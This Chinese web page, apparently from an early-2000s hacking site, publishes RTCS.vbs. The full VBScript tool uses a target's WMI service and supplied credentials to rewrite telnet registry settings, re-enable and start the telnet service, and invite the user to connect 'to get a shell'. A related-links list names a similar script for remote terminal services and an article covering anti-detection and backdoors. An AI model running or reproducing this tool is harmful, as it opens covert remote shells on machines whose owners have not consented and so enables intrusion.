远程开启/关闭目标telnet服务的windows脚本RTCS.vbs

********************************************************************************

RTCS v1.10

Remote Telnet Configure Script, by zzzEVAzzz

Welcome to visite www.isgrey.com

Usage:

cscript c:\scriptpath\RTCS.vbe targetIP username password NTLMAuthor telnetport

It will auto change state of target telnet server.

********************************************************************************

描述:远程开启/关闭目标telnet服务的windows脚本。

特点:不依赖于目标的ipc$开放与否。

原理:直接访问目标的windows管理规范服务(WMI)。该服务为系统重要服务,默认启动。

支持平台:win2kpro win2kserver winxp win.net

使用方法:

在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:

c:\>cscript RTCS.vbe <目标IP> <用户名> <密码> <NTLM验证方式> <telnet服务端口>

其中 NTLM 值可取0,1,2:

0: 不使用 NTLM 身份验证;

1: 先尝试 NTLM 身份验证。如果失败,再使用用户名和密码;

2: 只使用 NTLM 身份验证。

空密码用两个双引号""表示。

脚本自动检查目标telnet服务情况,如果未启动则启动它,相反就关闭。

同一个命令执行两遍,就开/关一次服务。

关闭服务时也必须输入共5个参数,这样可以根据需要把服务设置还原为默认值(NTLM=2,端口23)。

如果telnet服务被禁用,将自动更改为“手动”。

如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。

此脚本为自由软件,修改发布请著明原作者。谢谢合作。

本人提供有限技术支持,有问题请到论坛发短消息给我。我的ID是zzzevazzz

最后更新:2002-8-23

更新记录:

1.10  更改了输出显示格式。

1.09  解决了空密码的问题。

1.08  代码加密并以测试版发布。

1.07  增加对付服务被“禁用”的功能。

1.06  解决在图形界面下运行的问题。

1.05  对参数做简单判断,防止误操作。

1.04  增加显示Usage和详细过程功能。

1.03  增加关闭服务功能。

1.02  增加手动设置端口和NTLM功能。

1.00  完成基本功能,远程启动telnet服务,并设置NTLM=1。

代码如下:

on error resume next

set outstreem=wscript.stdout

if (lcase(right(wscript.fullname,11))="wscript.exe") then

set objShell=wscript.createObject("wscript.shell")

objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))

wscript.quit

end if

if wscript.arguments.count<5 then

usage()

wscript.echo "Not enough parameters."

wscript.quit

end if

ipaddress=wscript.arguments(0)

username=wscript.arguments(1)

password=wscript.arguments(2)

ntlm=wscript.arguments(3)

port=wscript.arguments(4)

if not isnumeric(ntlm) or ntlm<0 or ntlm>2 then

usage()

wscript.echo "The value of NTML is wrong."

wscript.quit

end if

if not isnumeric(port) then

usage()

wscript.echo "The value of port is wrong."

wscript.quit

end if

usage()

outstreem.write "Conneting "&ipaddress&"...."

set objlocator=createobject("wbemscripting.swbemlocator")

set objswbemservices=objlocator.connectserver(ipaddress,"root/default",username,password)

showerror(err.number)

outstreem.write "Setting NTLM="&ntlm&"...."

set objinstance=objswbemservices.get("stdregprov")

set objmethod=objinstance.methods_("SetDWORDvalue")

set objinparam=objmethod.inparameters.spawninstance_()

objinparam.hdefkey=&h80000002

objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0"

objinparam.svaluename="NTLM"

objinparam.uvalue=ntlm

set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)

showerror(objoutparam.returnvalue)

outstreem.write "Setting port="&port&"...."

objinparam.svaluename="TelnetPort"

objinparam.uvalue=port

set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)

showerror(objoutparam.returnvalue)

outstreem.write "Querying state of telnet server...."

set objswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password)

set colinstances=objswbemservices.execquery("select * from win32_service where name='tlntsvr'")

showerror(err.number)

for each objinstance in colinstances

if objinstance.startmode="Disabled" then

outstreem.write "Telnet server has been disabled. Now changeing start mode to manual...."

set objmethod=objinstance.methods_("changestartmode")

set objinparam=objmethod.inparameters.spawninstance_()

objinparam.startmode="Manual"

set objoutparam=objinstance.execmethod_("changestartmode",objinparam)

showerror(objoutparam.returnvalue)

end if

outstreem.write "Changeing state...."

if objinstance.started=true then

intstatus=objinstance.stopservice()

showerror(intstatus)

wscript.echo "Target telnet server has been STOP Successfully."

else

intstatus=objinstance.startservice()

showerror(intstatus)

wscript.echo "Target telnet server has been START Successfully!"

wscript.echo "Now, you can try: telnet "&ipaddress&" "&port&", to get a shell."

end if

next

function showerror(errornumber)

if errornumber<>0 then

wscript.echo "Error!"

wscript.quit

else

wscript.echo "OK!"

end if

end function

function usage()

wscript.echo string(79,"*")

wscript.echo "RTCS v1.10"

wscript.echo "Remote Telnet Configure Script, by zzzEVAzzz"

wscript.echo "Welcome to visite www.isgrey.com"

wscript.echo "Usage:"

wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password NTLMAuthor telnetport"

wscript.echo "It will auto change state of target telnet server."

wscript.echo string(79,"*")&vbcrlf

end function

(0)

相关推荐

  • 远程开启/关闭目标telnet服务的windows脚本RTCS.vbs

    ******************************************************************************** RTCS v1.10 Remote Telnet Configure Script, by zzzEVAzzz Welcome to visite www.isgrey.com Usage: cscript c:\scriptpath\RTCS.vbe targetIP username password NTLMAuthor teln

  • 远程启动终端服务的windows脚本ROTS.vbs

    ******************************************************************************* ROTS v1.05 Remote Open Terminal services Script, by zzzEVAzzz Welcome to visite www.isgrey.com Usage: cscript c:\scriptpath\ROTS.vbs targetIP username password [port] [/r

  • 通过关闭10种服务 提高Windows XP系统安全性的图文教程

    通过关闭10种服务 提高Windows XP系统安全性的图文教程

    提高系统安全性涉及到许多方面,其中重要的一步是关闭不必要的服务.虽然微软的Windows XP不是网络操作系统,但默认情况下它拥有的不少服务是打开的.对于一位清醒的微软用户而言,关闭一些不需要的服务是一个保障安全性的重要方面. 当然,每一个Windows版本都提供了不同的服务,因此,为安全目的而在一种系统中禁用的服务可能仅适用于一个特定版本.因此本文所讨论的服务列表可能仅适用于XP的特定版本.不过,本文所讨论的内容却可以为用户检查其它系统上的服务提供指南. 1.IIS:微软的互联网信息服务(II

  • CentOS 7.6 Telnet服务搭建过程(Openssh升级之战 第一任务备用运输线搭建)

    有不明的问题的时候,都来博客园转转,总能找到答案或者灵感,开博3个月都没发一篇帖(不晓得管理员有何感想,不会封我的号吧),不能只是索取没有付出.小白一枚琢磨了半天才扒拉明白Telnet服务搭建(照葫芦画瓢,也要知道葫芦从哪里来的),去繁就简,简单整理一下,分享一下. Linux上的ssh那么好用为什么还要用Telnet这么老旧的东东呢? 最近被SSH 暴力枚举漏洞弄得头疼,奈何CentOS7最后版本是7.7(里面只openssh7.4,想升级到openssh 8.0),用yum升级ssh是没戏了

  • 如何关闭Hyper-v虚拟服务

    如何关闭Hyper-v虚拟服务

    因为要安装docter,所以开启了Hyper-v,然后打开vmware,发现提示错误! 查资料才知道,hyper-v和vmware,只能同时运行一个!这就难受了,我还是选择vmware,不过也有共存的方案,只要设置两个开机引导就行了,但是我感觉不好,我就关闭了hyper; 注意:千万不要在启用window功能哪里取消勾选,反正我试了,然后重启我就蓝屏了: 打开Windows PowerShell(管理员) 以管理员身份运行 运行命令 bcdedit /set hypervisorlaunchty

  • CentOS7 下安装telnet服务的实现方法

    CentOS7 下安装telnet服务的实现方法

    CentOS7 下安装telnet服务的实现方法 今天搞了下 Centos 7 下面升级 openssl 和 openssh ,顺便装了下 telnet # 安装 telnet 避免 ssh 无法登录 yum -y install xinetd telnet telnet-server  # 允许 root 账号登陆 vi /etc/securetty # 末尾添加两行 pts/0 pts/1 # 添加防火墙端口 vi /etc/sysconfig/iptables -A INPUT -p tc

  • Java开启/关闭tomcat服务器的方法

    1.项目结构 2.CallTomcat.java package com.calltomcat.test; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; public class CallTomcat { public static void main(String[] args) { //String command = "E:\\apache-tomca

  • linux查看防火墙状态与开启关闭命令详解

    linux查看防火墙状态与开启关闭命令有以下两种方式: 一.service方式 查看防火墙状态: [root@centos6 ~]# service iptables status iptables:未运行防火墙. 开启防火墙: [root@centos6 ~]# service iptables start 关闭防火墙: [root@centos6 ~]# service iptables stop 二.iptables方式 先进入init.d目录,命令如下: [root@centos6 ~]

  • python中threading开启关闭线程操作

    在python中启动和关闭线程: 首先导入threading import threading 然后定义一个方法 def serial_read(): ... ... 然后定义线程,target指向要执行的方法 myThread = threading.Thread(target=serial_read) 启动它 myThread.start() 二.停止线程 不多说了直接上代码 import inspect import ctypes def _async_raise(tid, exctype

  • 深入挖掘Windows脚本技术第1/2页

    深入挖掘Windows脚本技术 文章作者:zzzEVAzzz <zzzevazzz@126.com> 为使文中涉及的代码整洁,将使用论坛的PHP标签处理.(没有VBS标签,code标签不好用,郁闷) 如果转载本文,请注意做相应调整. [目录] 1,前言 2,回顾WSH对象 3,WMI服务 4,脚本也有GUI 5,反查杀 6,来做个后门 7,结语 8,参考资料 [前言] 本文讲述一些Windows脚本编程的知识和技巧.这里的Windows脚本是指"Windows Script Host

随机推荐